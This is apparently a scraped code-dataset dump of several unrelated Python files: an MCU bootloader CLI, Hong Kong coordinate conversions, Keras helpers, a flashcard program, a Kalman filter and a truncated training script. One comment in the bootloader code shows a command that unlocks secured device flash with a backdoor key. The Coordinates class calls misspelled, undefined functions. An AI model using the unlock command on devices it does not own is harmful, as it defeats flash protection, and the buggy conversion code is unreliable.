raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n write(mb, args.address, args.filename, args.memory_id, args.offset, args.no_erase, args.exconf)\n print(\" Write Successfully.\")\n\n if cmd.read:\n args = cmd.read\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n read(mb, args.address, args.length, args.filename, args.memory_id, args.compress, args.exconf)\n\n if cmd.fill:\n args = cmd.fill\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n fill(mb, args.address, args.byte_count, args.pattern, args.unit, args.no_erase)\n print(\" Fill Successfully.\")\n\n if cmd.erase:\n args = cmd.erase\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n if args.address is None and not args.all:\n raise McuBootGenericError('If you do not use the full-chip erase mode, you must enter the erase address.')\n erase(mb, args.address, args.length, args.memory_id, args.all, args.exconf)\n print(\" Erase Successfully.\")\n\n if cmd.unlock:\n args = cmd.unlock\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n 
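# Hypothetical shell usage of this branch, with the backdoor key in the ASCII\n        # form documented by check_key's help above: mboot -u unlock -k S:12345678\n        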
unlock(mb, args.key)\n print(\" Unlock Successfully.\")\n\n if cmd.reset:\n args = cmd.reset\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n mb.reset()\n print(' Reset Successfully.')\n\n if cmd.origin:\n mb.timeout = cmd.timeout or mb.timeout\n attr = cmd.origin[0].replace('-', '_')\n func = getattr(mb, attr, None)\n\n if func:\n cmd_args = cmd.origin[1:]\n # if cmd_args[0].lower().startswith('-h'): # cmd_args[0].lower() == '-h' or cmd_args[0].lower() == '--help':\n # print('\\n '.join(line.strip() for line in func.__doc__.split('\\n ')))\n if check_method_arg_number(func, len(cmd_args)):\n if attr == 'flash_security_disable':\n args = cmd_args\n else:\n args = convert_arg_to_int(cmd_args)\n data = func(*args)\n if attr == 'read_memory':\n print('\\n', hexdump(data, args[0], False))\n else:\n raise McuBootGenericError('invalid arguments:{}'.format(cmd_args))\n else:\n raise McuBootGenericError('invalid command:{}'.format(cmd.origin[0]))\n\n mb.close()\n","sub_path":"mboot/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":31382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"654013445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 31 21:50:47 2016\n\n@author: KITMAN\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import fsolve\n\n#================================#\n# Fixed constants\n#================================#\n\nfix_parms = {'a': 6378388, \n 'f': 1 / 297,\n 'e_sq': 2 / 297 - (1 / 297)**2,\n 'm0': 1,\n 'E0': 836694.05,\n 'N0': 819069.80,\n 'lambda0': (114 + 10 / 60 + 42.80 / 3600) / 180 * np.pi,\n 'phi0': (22 + 18 / 60 + 43.68 / 3600) / 180 * np.pi}\n\n\n\n\n#================================#\n# Projection parameters\n#================================#\n\ndef get_proj_parms(phi = (22 + 18 / 60 + 43.68 / 3600) / 180 * np.pi): \n a = fix_parms[\"a\"]\n e_sq = fix_parms[\"e_sq\"]\n upsilon = a / (1 - e_sq * np.sin(phi)**2)**(1 / 2)\n rho = a * (1 - e_sq) / (1 - e_sq * np.sin(phi)**2)**(3 / 2)\n psi = upsilon / rho\n # Note that the values of rho and psi are different from the note,\n # where upsilon = 6381480.500, rho = 6359840.760, psi = 1.003402560.\n # This issue has been reported to the Geodetic Survey Section, Lands Department, Hong Kong\n # and it is under investigation.\n out = {'upsilon': upsilon,\n 'rho': rho,\n 'psi': psi}\n return out\n\n\n\n\n#================================#\n# Meridian distance\n#================================#\n\ndef meridian_dist(phi, a = fix_parms[\"a\"], e_sq = fix_parms[\"e_sq\"]):\n # Constants\n A0 = 1 - e_sq / 4 - 3 * e_sq**2 / 64\n A2 = 3 / 8 * (e_sq + e_sq**2 / 4)\n A4 = 15 / 256 * e_sq**2\n mdist = a * (A0 * phi - A2 * np.sin(2 * phi) + A4 * np.sin(4 * phi))\n return mdist\n\n\n\n\n#================================#\n# Transformation function\n# Conversion between \n# 1. HK80G: HK 1980 Grid Coordinates, \n# 2. HK80: HK 1980 Geodetic Coordinates\n# 3. 
WGS84: WGS84 Latitude and Longitude (ITRF96)\n# lng and lat are expressed in degree by default\n#================================#\n\n## HK80G to HK80\ndef hk80g_to_hk80(E, N, unit = \"d\"):\n    # Get all necessary parameters\n    lambda0 = fix_parms[\"lambda0\"]\n    phi0 = fix_parms[\"phi0\"]\n    E0 = fix_parms[\"E0\"]\n    N0 = fix_parms[\"N0\"]\n    m0 = fix_parms[\"m0\"]\n    M0 = meridian_dist(phi = phi0) # M0 = 2468395.723\n    f = lambda phi: (meridian_dist(phi) - (N - N0 + M0) / m0) # Find phi_p using eqt3 in Note\n    phi_p = np.asscalar(fsolve(f, 0))\n    proj_parms = get_proj_parms(phi_p)\n    upsilon = proj_parms[\"upsilon\"]\n    rho = proj_parms[\"rho\"]\n    psi = proj_parms[\"psi\"]\n    # Obtain lng and lat in HK80\n    lng = lambda0 + 1 / np.cos(phi_p) * (E - E0) / (m0 * upsilon) - 1 / np.cos(phi_p) * (E - E0)**3 / (6 * m0**3 * upsilon**3) * (psi + 2 * np.tan(phi_p)**2)\n    lat = phi_p - np.tan(phi_p) / (m0 * rho) * (E - E0)**2 / (2 * m0 * upsilon)\n    if (unit == \"d\"):\n        lng = lng * 180 / np.pi\n        lat = lat * 180 / np.pi\n    # Output\n    out = pd.Series({'lng': lng, 'lat': lat})[[\"lng\", \"lat\"]]\n    return out\n\n\ndef hk80_to_hk80g(lng, lat, unit = \"d\"):\n    if (unit == \"d\"):\n        lng = lng * np.pi / 180\n        lat = lat * np.pi / 180\n    lambda0 = fix_parms[\"lambda0\"]\n    phi0 = fix_parms[\"phi0\"]\n    E0 = fix_parms[\"E0\"]\n    N0 = fix_parms[\"N0\"]\n    m0 = fix_parms[\"m0\"]\n    M0 = meridian_dist(phi0) # M0 = 2468395.723\n    M = meridian_dist(lat)\n    proj_parms = get_proj_parms()\n    upsilon = proj_parms[\"upsilon\"]\n    psi = proj_parms[\"psi\"]\n    # Obtain E, N coordinates\n    E = E0 + m0 * (upsilon * (lng - lambda0) * np.cos(lat) + upsilon * (lng - lambda0)**3 / 6 * (np.cos(lat))**3 * (psi - (np.tan(lat))**2))\n    N = N0 + m0 * ((M - M0 + upsilon * np.sin(lat) * (lng - lambda0)**2 / 2 * np.cos(lat)))\n    # Output\n    out = pd.Series({'E': E, 'N': N})[[\"E\", \"N\"]]\n    return out\n\n\n\n\n## WGS84 <-> HK80\ndef wgs84_to_hk80(lng, lat, unit = \"d\"):\n    if (unit == \"r\"):\n        lng = lng - 8.8 / 60**2 * np.pi / 180\n        lat = lat + 5.5 / 60**2 * np.pi / 180\n    elif (unit == \"d\"):\n        lng = lng - 8.8 / 60**2\n        lat = lat + 5.5 / 60**2\n    # Output\n    out = pd.Series({'lng': lng, 'lat': lat})[[\"lng\", \"lat\"]]\n    return out\n\n\ndef hk80_to_wgs84(lng, lat, unit = \"d\"):\n    if (unit == \"r\"):\n        lng = lng + 8.8 / 60**2 * np.pi / 180\n        lat = lat - 5.5 / 60**2 * np.pi / 180\n    elif (unit == \"d\"):\n        lng = lng + 8.8 / 60**2\n        lat = lat - 5.5 / 60**2\n    # Output\n    out = pd.Series({'lng': lng, 'lat': lat})[[\"lng\", \"lat\"]]\n    return out\n\n\n\n\n## WGS84 <-> HK80G (Through HK80)\ndef wgs84_to_hk80g(lng, lat, unit = \"d\"):\n    hk80_coords = wgs84_to_hk80(lng = lng, lat = lat, unit = unit)\n    out = hk80_to_hk80g(lng = hk80_coords[\"lng\"], lat = hk80_coords[\"lat\"], unit = unit)\n    return out\n\n\ndef hk80g_to_wgs84(E, N, unit = \"d\"):\n    hk80_coords = hk80g_to_hk80(E = E, N = N, unit = unit)\n    out = hk80_to_wgs84(lng = hk80_coords[\"lng\"], lat = hk80_coords[\"lat\"], unit = unit)\n    return out\n\n\n\n\n#================================#\n# Class Coordinates\n# x: Longitude/Easting, y: Latitude/Northing\n#================================#\nclass Coordinates(object):\n    def __init__(self, x, y, datum):\n        self.datum = datum.lower()\n        \n        try:\n            try:\n                xy = pd.DataFrame({'x': x, 'y': y})\n            except:\n                xy = pd.DataFrame({'x': [x], 'y': [y]})\n            \n            self.xy = xy\n        except:\n            pass\n            #warnings.warn(\"Invalid input 'x' and 'y'!\")\n        \n        \n    def to_wgs84(self):\n        datum = self.datum\n        new_xy = self.xy.copy()\n        if datum == \"wgs84\":\n            new_xy = new_xy\n        elif datum == 
\"hk80\":\n tran = lambda df: hk80_to_to_wgs84(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80g\":\n tran = lambda df: hk80g_to_to_wgs84(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n else:\n return None\n new_xy.columns = [\"Longitude\", \"Latitude\"]\n return new_xy\n \n \n def to_hk80(self):\n datum = self.datum\n new_xy = self.xy.copy()\n if datum == \"wgs84\":\n tran = lambda df: wgs84_to_hk80(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80\":\n new_xy = new_xy\n elif datum == \"hk80g\":\n tran = lambda df: hk80g_to_hk80(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n else:\n return None\n new_xy.columns = [\"Longitude\", \"Latitude\"]\n return new_xy\n \n \n def to_hk80g(self):\n datum = self.datum\n new_xy = self.xy.copy()\n if datum == \"wgs84\":\n tran = lambda df: wgs84_to_hk80g(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80\":\n tran = lambda df: hk80_to_hk80g(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80g\":\n new_xy = new_xy\n else:\n return None\n new_xy.columns = [\"Easting\", \"Northing\"]\n return new_xy\n \n\n\n\n#================================#\n#Example\n#================================#\n#coords = Coordinates([836055, 832591.320], [832699, 820351.389], \"hk80g\")\n#coords.to_wgs84()\n#coords.to_hk80()\n#coords.to_hk80g()\n#\n#coords = [[836055, 832699], [832591.320, 820351.389]]\n#coords_df = pd.DataFrame(coords, columns = [\"E\", \"N\"])\n#\n#hk80g_to_hk80(836055, 832699)\n#hk80_to_hk80g(114+10/60+20.46/3600, 22+26/60+6.76/3600)\n#wgs84_to_hk80g(114.141187917, 22.322172084)\n#coords_df.apply(lambda x: hk80g_to_wgs84(x[\"E\"], x[\"N\"]), axis = 1)\n#================================#\n\n\n\n\n#================================#\n#Reference\n#================================#\n#https://www.geodetic.gov.hk/smo/gsi/data/pdf/explanatorynotes.pdf\n#https://www.geodetic.gov.hk/smo/gsi/data/pdf/explanatorynotes_c.pdf # (Traditional Chinese version)\n#https://www.geodetic.gov.hk/smo/gsi/data/parameter/SchematicDiagram.pdf\n#https://www.geodetic.gov.hk/smo/tform/tform.aspx\n#https://www.geodetic.gov.hk/smo/en/tform/tform.aspx\n#http://www.hydro.gov.hk/eng/datumnew.php\n#http://cs2cs.mygeodata.eu/\n#https://en.wikipedia.org/wiki/World_Geodetic_System\n#http://ailin.phychembio.com/miscellany/1387/\n#http://blog.tiger-workshop.com/hk1980-grid-to-wgs84/\n#================================#\n","sub_path":"Py/geodeticHK.py","file_name":"geodeticHK.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"70473311","text":"import keras\nimport pandas as pd\nimport numpy as np\nfrom string import ascii_lowercase as alphabet\nfrom keras.utils import to_categorical\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import model_from_json\n\n\n\n\n#Load data \ndef loadData(dir):\n\tdata = pd.DataFrame(pd.read_csv(str(dir) + '.csv')).as_matrix()\n\tprint(\"Data Loaded\")\n\treturn(data)\n\ndef setupDictionary():\n\tOHs = to_categorical(np.arange(len(alphabet)))\n\tdictionary = {c:OH for c,OH in zip(alphabet,OHs)}\n\trev_dictionary = {i:c for i,c in enumerate(alphabet)}\n\treturn dictionary, rev_dictionary\n\ndef dataToWords(data):\n\twordsY = []\n\twordsX = []\n\twordY = ''\n\twordX = []\n\tix = 0\n\tmax_ix = data.shape[0]\n\twhile ix < max_ix:\n\t\tif data[ix,2] == 
-1:\n\t\t\twordY+=data[ix,1]\n\t\t\twordX.append(data[ix,4:].reshape(16,8,1))\n\t\t\twordsY.append(wordY)\n\t\t\twordsX.append(np.asarray(wordX))\n\t\t\twordY = ''\n\t\t\twordX = []\n\t\telse:\n\t\t\twordY+=data[ix,1]\n\t\t\twordX.append(data[ix,4:].reshape(16,8,1))\n\t\tix+=1\n\twordsX = np.asarray(wordsX)\n\twordsY = np.array(wordsY)\n\treturn wordsX,wordsY\n\n\ndef seqData(seq_length,wordsX, wordsY, dictionary, test = False):\n\t#max_len = np.max([len(word) for word in wordsY])\n\tdataX = []\n\tdataY = []\n\tfor word_idx in range(wordsX.shape[0]):\n\t\tfor i in range(0, wordsX[word_idx].shape[0]- seq_length +1, 1):\n\t\t\tseq_in = wordsX[word_idx][i:i + seq_length]\n\t\t\tseq_out = wordsY[word_idx][i:i + seq_length]\n\t\t\tdataX.append(seq_in)\n\t\t\tdataY.append(seq_out)\n\tdataX = np.asarray(dataX)\n\tX_seq = pad_sequences(dataX, maxlen = seq_length, dtype = 'float32')\n\tY_seq = np.array([np.array([dictionary[c] for c in w]) for w in dataY])\n\tY_seq = pad_sequences(Y_seq, maxlen = seq_length, dtype = 'float32')\n\tY_seq = np.reshape(Y_seq, (len(Y_seq), seq_length,Y_seq.shape[2]))\n\tX_seq = np.reshape(X_seq, (len(X_seq), seq_length,X_seq.shape[2],X_seq.shape[3],X_seq.shape[4]))\n\treturn X_seq,Y_seq\n\ndef len_indexes(words, length):\n\tlen_index = []\n\tfor i in range(len(words)):\n\t\tif len(words[i]) == length:\n\t\t\tlen_index.append(i)\n\treturn np.array(len_index)\n\ndef save_model(model, Net, version = 1, l = 0):\n\t# serialize model to JSON\n\tmodel_json = model.to_json()\n\twith open(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+ str(l) + \".json\", \"w\") as json_file:\n\t    json_file.write(model_json)\n\t# serialize weights to HDF5\n\tmodel.save_weights(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+str(l)+\".h5\")\n\tprint(\"Saved model to disk: \" + \"model_\"+ Net +\"v\"+ str(version) + \"_\"+ str(l))\n\ndef load_model(Net, version = 0, l = 0):\n\t# load json and create model\n\tjson_file = open(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+ str(l) + \".json\", 'r')\n\tloaded_model_json = json_file.read()\n\tjson_file.close()\n\tloaded_model = model_from_json(loaded_model_json)\n\t# load weights into new model\n\tloaded_model.load_weights(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+str(l)+\".h5\")\n\tprint(\"Loaded model from disk: \" + \"model_\"+ Net +\"v\"+ str(version) + \"_\"+str(l))\n\treturn loaded_model\n\n\n","sub_path":"HelperFunctions.py","file_name":"HelperFunctions.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"547092245","text":"# LTAT.03.001 - Introduction to Computer Programming @ Tartu University - Project\n# 11/2018\n# This file implements the program functionality on command line.\n\nimport flashcardclasses as fc\ndeck_arr = [] # list of decks to be loaded in\n\n####################################################\n\ndef load_data(filename = \"data.txt\", arr = deck_arr):\n    # in: str, list\n    # out: None\n    # Loads the data from filename.\n    file = open(filename, mode=\"r\", encoding=\"UTF-8\")\n    data_iter = 0 # card data iterator\n    data_list = [] # card data itself\n    \n    for line in file:\n        if line[0] == '\\t': # if flashcard data...\n            data_iter += 1\n            line = line.strip()\n            if data_iter != 0: # subpar\n                if data_iter < 3: # first two - strings\n                    data_list.append(line)\n                elif data_iter < 4: # ease\n                    data_list.append(float(line))\n                elif data_iter < 5: # streak\n                    data_list.append(int(line))\n                elif data_iter == 5: # due\n                    
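# The 'due' field is stored on disk as a unix timestamp (save_data() writes\n                    # data[-1].timestamp() below), so it is parsed back into a datetime here;\n                    # e.g. 1541030400.0 would be a hypothetical stored value.\n                    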
data_list.append(fc.dt.datetime.fromtimestamp(float(line)))\n                # adding cards to latest deck...\n                arr[-1].load_card(fc.Flashcard(data_list[0],data_list[1],data_list[2],data_list[3],data_list[4]))\n                data_list = [] # reset data list and iterator for new data\n                data_iter = 0\n        else: # if not data, add new deck to list.\n            arr.append(fc.Deck(line))\n    file.close()\n    \ndef save_data(filename = \"data.txt\", arr = deck_arr):\n    # in: str, list\n    # out: None\n    # Saves the current state decks and cards into filename.\n    file = open(filename, mode=\"w\", encoding=\"UTF-8\")\n    for deck in deck_arr:\n        file.write(deck.get_title() + '\\n')\n        for card in deck:\n            data = card.get_all_data()\n            data[-1] = data[-1].timestamp() # unix timestamp\n            for elem in data:\n                file.write('\\t' + str(elem) + '\\n')\n    file.close()\n\ndef print_all_cards(reload = 0, arr = deck_arr):\n    # in: int, list\n    # prints all cards we have loaded\n    if reload: # if reload is true, we'll load data in again.\n        load_data()\n    for deck in arr:\n        print(\"Deck name: \" + deck.get_title())\n        for card in deck:\n            print('\\t' + str(card))\n\n####################################################\n# Try to load the data.\ntry:\n    load_data()\nexcept FileNotFoundError:\n    save_data() # creates file should it not exist\n\n####################################################\n# Command line interface.\ndef main_screen():\n    opt = {0: \"q\", 1: decks_screen, 2: study_screen}\n    txt = [\"Quit\", \"Decks\", \"Study\"]\n\n    for i in range(len(opt)):\n        print(\"{}: {}\".format(str(i), txt[i]))\n\n    n = int(input(\"Option: \"))\n    return opt[n]\n\ndef decks_screen(arr = deck_arr):\n    opt = {0:\"q\", 1: main_screen, 2: new_deck, 3: delete_deck, 4: edit_deck}\n    txt = [\"Quit\", \"Home\", \"New deck\", \"Delete deck\", \"Edit deck\"]\n\n    print(\"Your decks are currently as follows: \")\n    for i in range(len(arr)):\n        print(\"{}: {}, due: {}\".format(str(i), arr[i].get_title(), arr[i].count_due()))\n    \n    for i in range(len(opt)):\n        print(\"{}: {}\".format(str(i), txt[i]))\n    n = int(input(\"Option: \"))\n    return opt[n]\n\ndef new_deck(arr = deck_arr):\n    title = input(\"Enter a title for your new deck: \")\n    arr.append(fc.Deck(title))\n    return decks_screen\n\ndef delete_deck(arr = deck_arr):\n    n = int(input(\"Enter the number of the deck you wish to delete: \"))\n    del arr[n]\n    return decks_screen\n\ndef edit_deck(arr = deck_arr):\n    def new_card(deck):\n        front = input(\"Enter front side of card: \")\n        back = input(\"Enter back side of card: \")\n        deck.add_card(front, back)\n    def delete_card(deck):\n        n = int(input(\"Enter the number of the card you wish to delete: \"))\n        deck.remove_card_i(n)\n    def edit_card(deck):\n        n = int(input(\"Enter the number of the card you wish to edit: \"))\n        print(\"Current card data: {}\".format(deck.get_card(n)))\n\n        active_card = deck.get_card(n)\n\n        change_front_choice = input(\"Do you wish to change the front of the card? y/n: \")\n        while change_front_choice.lower() != \"y\" and change_front_choice.lower() != \"n\":\n            change_front_choice = input(\"Invalid input. Change the front of the card? y/n: \")\n        if change_front_choice.lower() == \"y\":\n            new_front = input(\"Enter the new front side of the card: \")\n            active_card.set_front(new_front)\n\n        change_back_choice = input(\"Do you wish to change the back of the card? y/n: \")\n        while change_back_choice.lower() != \"y\" and change_back_choice.lower() != \"n\":\n            change_back_choice = input(\"Invalid input. Change the back of the card? 
y/n: \")\n if change_back_choice.lower() == \"y\":\n new_back = input(\"Enter the new back side of the card: \")\n active_card.set_back(new_back)\n\n reset_data_choice = input(\"Do you wish to reset the data of the card? y/n: \")\n while reset_data_choice.lower() != \"y\" and reset_data_choice.lower() != \"n\":\n reset_data_choice = input(\"Invalid input. Reset the data of the card? y/n: \")\n if reset_data_choice.lower() == \"y\":\n active_card.card_reset()\n deck.replace_card(n, active_card)\n\n deck_n = int(input(\"Enter the number of the deck you wish to edit: \"))\n active_deck = arr[deck_n]\n \n print_cards = input(\"Print all cards? y/n: \")\n while print_cards.lower() != \"y\" and print_cards.lower() != \"n\":\n print_cards = input(\"Invalid input. Print all cards? y/n: \")\n if print_cards.lower() == \"y\":\n for i in range(len(active_deck)):\n active_card = active_deck.get_card(i)\n front = active_card.get_front()\n back = active_card.get_back()\n print(\"{}: Front: {}, Back: {}\".format(str(i), front, back))\n \n opt = {0:\"\", 1: main_screen, 2: new_card, 3: delete_card, 4: edit_card}\n txt = [\"Back to decks\", \"Home\", \"New card\", \"Delete card\", \"Edit card\"]\n\n for i in range(len(opt)):\n print(\"{}: {}\".format(str(i), txt[i]))\n n = int(input(\"Option: \"))\n while n != 0:\n if n == 2 or n == 3 or n == 4:\n opt[n](arr[deck_n])\n n = int(input(\"Option: \"))\n if n == 1:\n return opt[n]\n return decks_screen\n\ndef study_screen(arr=deck_arr):\n print(\"Your decks are currently as follows: \")\n for i in range(len(arr)):\n print(\"{}: {}, due: {}\".format(str(i), arr[i].get_title(), arr[i].count_due()))\n n = int(input(\"Enter the number of the deck you wish to study with or -1 to cancel: \"))\n if n == -1:\n return main_screen\n else:\n active_deck = arr[n]\n while active_deck.get_card().is_due():\n data = active_deck.get_card_display()\n print(data[0])\n input(\"Press enter to reveal back side.\")\n print(data[1])\n print(\"Rate your ease of recall. -1 to quit.\")\n performance = int(input(\"0: Failed, 4: Hard, 5: Medium, 6: Easy : \"))\n while performance < -1 or performance > 6:\n performance = int(input(\"0: Failed, 4: Hard, 5: Medium, 6: Easy : \"))\n if performance == -1:\n return study_screen\n active_deck.edit_card(0, performance)\n cont = input(\"Continue? y/n: \")\n while cont.lower() != \"y\" and cont.lower() != \"n\":\n cont = input(\"Invalid input. Continue? y/n: \")\n if cont.lower() == \"n\":\n return study_screen\n print(\"No more cards are due.\")\n return study_screen\n \n####################################################\n# Program loop.\nchosen = main_screen\nwhile chosen != \"q\":\n chosen = chosen()\n save_data()\nelse:\n save_data()\n print(\"Goodbye!\")","sub_path":"flashcardprog.py","file_name":"flashcardprog.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"572172079","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2016 Michael Welter\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n\n'''\n Kalman filter base module.\n'''\n\nimport numpy as np\nimport numpy.matlib as mt\n\n# because the matrix type enables the use of '*' as matrix product instead\n# of element wise multiplication. 
This is STUPIDLY DANGEROUS as forgotten\n# conversions to matrix will result in element wise multiplication.\n# Still I like to store my data in N x NumStateVars x SomeOtherDimension\n# sized arrays.\nM = mt.asmatrix\n\n\ndef exponentialSmooth(x, dt, T):\n    ''' compute IIR filter using simple weighted average of last result and\n        current input.\n        \n        x = array of inputs\n        dt = sampling distance\n        T = filter window size\n    '''\n    x = x.copy()\n    if hasattr(dt, '__iter__') or hasattr(T, '__iter__'):\n        dt = np.resize(np.asarray(dt), (len(x),))\n        T = np.resize(np.asarray(T), (len(x),))\n        for i in xrange(1, len(x)):\n            f = dt[i] / (dt[i] + T[i])\n            x[i] = x[i-1] * (1. - f) + x[i] * f\n    else:\n        f = dt / (dt + T)\n        for i in xrange(1, len(x)):\n            x[i] = x[i-1] * (1. - f) + x[i] * f\n    return x\n\n\ndef deadzoneFilter(x, w):\n    '''\n    w is the size of the deadzone.\n    \n    Small variations of the input x are suppressed. If the input 'moves'\n    by more than w, the output starts following the input.\n    '''\n    y = x.copy()\n    for i in xrange(1, len(x)):\n        dxy = (x[i] - y[i-1])\n        if w[i] > 0.:\n            f = np.power(np.abs(dxy)/w[i], 4.)\n            response = f / (1 + f) * dxy\n            y[i] = y[i-1] + response\n        else:\n            y[i] = x[i]\n    return y\n    \n    \n\n\nclass Constant(object):\n    '''\n    Always return the same object.\n    Lets me write\n    A = Constant(M([.....]))\n    ....\n    a_at_kth_step = A(k)\n    Because KF should handle time varying things.\n    '''\n    def __init__(self, obj):\n        self.obj = obj\n    \n    def __call__(self, k):\n        return self.obj\n\n\nclass KalmanFilter(object):\n    '''\n    You need to set some attributes for this to function, namely\n    \n    A = process matrix\n    Q = process noise cov\n    H = measurement matrix\n    R = measurement noise cov\n    initialP = initial estimate cov\n    '''\n    def __init__(self, numStateVars, measurements):\n        measurements = np.asarray(measurements)\n        self.NZ = NZ = measurements.shape[1]\n        self.N = N = measurements.shape[0]\n        self.NS = NS = numStateVars\n        sz_state = (N, NS, 1)\n        sz_cov = (N, NS, numStateVars)\n        sz_K = (N, NS, NZ)\n        self.I = mt.identity(NS)\n        self.xhat = np.zeros(sz_state) # a posteriori estimate of x\n        self.P = np.zeros(sz_cov) # a posteriori error estimate\n        self.xhatminus = np.zeros(sz_state) # a priori estimate of x\n        self.Pminus = np.zeros(sz_cov) # a priori error estimate\n        self.K = np.zeros(sz_K) # gain or blending factor\n        self.z = np.reshape(measurements, (N, NZ, 1))\n\n    def timeUpdate(self, k):\n        A = M(self.A(k))\n        self.xhatminus[k] = A * M(self.xhat[k-1])\n        Q = M(self.Q(k))\n        self.Pminus[k] = A * M(self.P[k-1]) * A.T + Q\n\n    def measurementUpdate(self, k):\n        z = M(self.z[k])\n        H = M(self.H(k))\n        R = M(self.R(k))\n        Pminus = M(self.Pminus[k])\n        xhatminus = M(self.xhatminus[k])\n        # measurement update\n        self.K[k] = K = Pminus * H.T * np.linalg.inv( H * Pminus * H.T + R )\n        self.xhat[k] = xhatminus + K * (z - H * xhatminus)\n        self.P[k] = ( self.I - K * H ) * Pminus\n\n    def run(self):\n        self.P[0] = self.initialP\n        self.Pminus[0] = self.initialP\n        for k in xrange(1, self.N):\n            self.timeUpdate(k)\n            self.measurementUpdate(k)\n\n    @property\n    def output(self):\n        return self.xhat[:,:,0]\n\n\n\nclass QScalingBase(object):\n    '''\n    Can be used as Q in KalmanFilter using composition like so\n    kf = KalmanFilter\n    kf.Q = QScalingSomething(kf, something)\n    ...\n    '''\n    def __init__(self, kf, L, exponent):\n        self.kf = kf\n        self.L = L\n        self.exponent = exponent\n        self.baseQ = kf.Q # baseline Q, captured before kf.Q is replaced by this object\n        N, NZ, NS = kf.N, kf.NZ, kf.NS\n        self.alpha = np.ones(N)\n        self.Qhat = np.zeros((N, NS, NS))\n        self.d = np.zeros((N, NZ, 1))\n        self.D = np.zeros((N, NZ, NZ))\n\n    def 
__call__(self, k):\n        L = self.L\n        self.d[k] = d = self.kf.z[k] - self.kf.H(k) * M(self.kf.xhatminus[k])\n        self.D[k] = self.D[k-1] * (L-1.)/L + (M(d) * M(d).T) * (1./L)\n        Q = self.calculateQ(k)\n        self.Qhat[k] = Q\n        return Q\n\n\nclass Qscaling1(QScalingBase):\n    '''\n    Inspired by \"Improving Adaptive Kalman Filter in GPS/SDINS Integration \n    with Neural Network\" by Wang et al. Eq. (21).\n    Q[k] = K E{d[k] d[k]T} KT. \n    E{ ... } is estimated expectation by time average. \n    d[k] is the series of innovations: d[k] = z[k] - H x[k]^-\n    \n    Big limitation: it only predicts the \"position\" entry of Q[k],\n    i.e. the position variance.\n    Therefore I use the baseline Q and scale it so that Q[k][1,1]\n    matches the estimated position variance.\n    ''' \n    def calculateQ(self, k):\n        baseQ = M(self.baseQ(k))\n        K = M(self.kf.K[k-1])\n        D = M(self.D[k])\n        \n        Qest = K * D * K.T\n        #print D, K\n\n        f = mt.trace(Qest) / mt.trace(baseQ)\n        f = np.power(f, self.exponent)\n        f = min(10000000., f)\n        Q = baseQ * f\n        self.alpha[k] = f\n        return Q\n\n\nclass Qscaling2(QScalingBase):\n    '''\n    Inspired by \"Improving Adaptive Kalman Estimation in GPS/INS Integration\" by Ding et al. (2007).\n    Scale Q[k] by some factor derived from the estimated cov of the innovation sequence. \n    '''\n    def calculateQ(self, k):\n        Q = M(self.baseQ(k))\n        R = M(self.kf.R(k))\n        H = M(self.kf.H(k))\n        D = M(self.D[k-1])\n        \n        alpha = np.trace(D - R) / np.trace(H * M(self.kf.Pminus[k-1]) * H.T)\n        alpha = np.asscalar(alpha)\n        if np.isfinite(alpha) and alpha>0:\n            alpha = np.power(alpha, self.exponent)\n            alpha = max(0.0001, min(alpha, 1000.*mt.trace(R) / mt.trace(Q)))\n        else:\n            alpha = 0.0001\n        Q = Q * alpha\n        self.alpha[k] = alpha\n        return Q\n","sub_path":"kalmanfilter.py","file_name":"kalmanfilter.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111206435","text":"import itertools\nimport math\n\nimport numpy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\nfrom torch.nn import Linear, MSELoss\nfrom torch.nn import functional as F\nfrom torch.optim import SGD, Adam\n\nimport wandb\nfrom datasets import get_datasets\nfrom log_utils import AverageMeter, wandb_auth\nfrom utils import (\n    data_generator,\n    eval_features,\n    featurize,\n    hessian,\n    jacobian,\n)\nfrom models import SoTLNet\nfrom sotl_utils import sotl_gradient, WeightBuffer\nimport scipy.linalg\nimport time\nimport fire\n\ndef train_bptt(\n    num_epochs: int,\n    model,\n    criterion,\n    w_optimizer,\n    a_optimizer,\n    dset_train,\n    dset_val,\n    batch_size: int,\n    T: int,\n    w_checkpoint_freq: int,\n    